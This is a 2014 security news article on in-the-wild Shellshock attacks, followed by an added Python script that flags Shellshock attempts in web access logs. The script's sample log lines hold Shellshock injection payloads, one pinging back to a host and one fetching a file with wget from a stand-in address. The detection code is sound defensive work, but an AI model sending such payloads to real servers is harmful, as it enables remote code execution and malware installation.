IT Security Guru

Shellshock-related attacks detected

by The Gurus
September 26, 2014
in Editor's News

Within hours of the Shellshock/Bash vulnerability being disclosed, attacks exploiting it in the wild to download additional malware were detected.
 
According to Zscaler’s ThreatLabZ research team, upon successful exploitation of the CVE-2014-6271 vulnerability, an attacker is able to download and install a malicious ELF binary on the target Linux system. The malware connects to a predetermined Command and Control server on a specific port and awaits further instructions from the attacker.
 
Other threat labs also reported attacks. According to AlienVault’s Jaime Blasco, the company began running a new module in its honeypots upon notification of the flaw, and it observed “several hits” in the last 24 hours.
 
He said: “Most of them are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker’s machine.” He also said that the honeypot received another interesting attack from a file with a PERL script that seems to be a repurposed IRC bot that connects to an IRC server and waits for commands.
 
Blasco said: “As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443, it joins a channel on the IRC server. It seems there are 715 users (probably victims) connected to the server right now. As soon as new victims join the server, the attackers are executing the command ‘uname -a’ to determine the operating system that is running on the victim as well as ‘id’ to check the current username. Since our honeypot joined the server, more than 20 new victims have become part of the botnet.”
 
Wolfgang Kandek, CTO of Qualys, said: “Our Web Application Firewall has the signatures needed to detect and block Shellshock attacks against websites. The detection is very reliable and is activated by default in the “normal” and “aggressive” settings on the WAF configuration page.
 
“Qualys scanners are considered not exploitable via the BASH vulnerability. Although Qualys scanners have a version of Bash vulnerable to CVE-2014-6271 installed, the scanner exposes no listening interfaces and services to the network, closing the common attack vectors discussed in the release of CVE-2014-6271. Further, Bash is not used in any of the communication mechanisms that the scanner uses: scan dispatching, software updates and monitoring. We will update Bash on the scanner in the next system update cycle.”
 
Check Point said in an update that it had released an IPS signature to protect customer environments. It said: “The signature enables organisations to add a layer of protection to their network during the time they need to update their systems with vendor provided patches. This protection will detect and block attempts to exploit this vulnerability.”
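
As an added illustration (not code from the article or from any vendor named in it), the sketch below shows the kind of signature-based detection described above, applied to web server access logs: it flags the Bash function-definition prefix that CVE-2014-6271 depends on and gives a rough triage of each hit. The log lines are constructed samples using documentation addresses, and the function names `scan` and `classify` are hypothetical.

```python
import re

# CVE-2014-6271 is triggered by a value that starts with a Bash function
# definition, "() {"; whitespace between the tokens can vary.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format: client, request, status, size,
# referer, user-agent. Lines that do not fit the format are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

def classify(value):
    """Rough triage of the command that follows the function definition."""
    tail = value[SHELLSHOCK_RE.search(value).end():]
    if re.search(r"\bping\b", tail):
        return "probe"      # vulnerability check that pings back
    if re.search(r"\b(wget|curl)\b", tail):
        return "download"   # attempt to fetch a second-stage file
    return "other"

def scan(lines):
    """Return (line_no, client_ip, field, category) for each suspicious line."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append((line_no, m.group("ip"), field, classify(value)))
                break
    return hits

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/ping -c 1 198.51.100.7"',
    '203.0.113.9 - - [25/Sep/2014:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 87 "() { :; }; wget http://example.invalid/a" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2014:10:04:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.12 - - [25/Sep/2014:10:06:00 +0000] "GET / HTTP/1.1" 200 1043 "-" "(){ :;}; echo test"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the request line, Referer and User-Agent, so attempts carried in other headers such as Cookie are visible only to inline inspection (a WAF or IPS) or full request capture.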

Tags: AlienVault, Bash, Shellshock, ThreatLabZ, Vulnerability, zscaler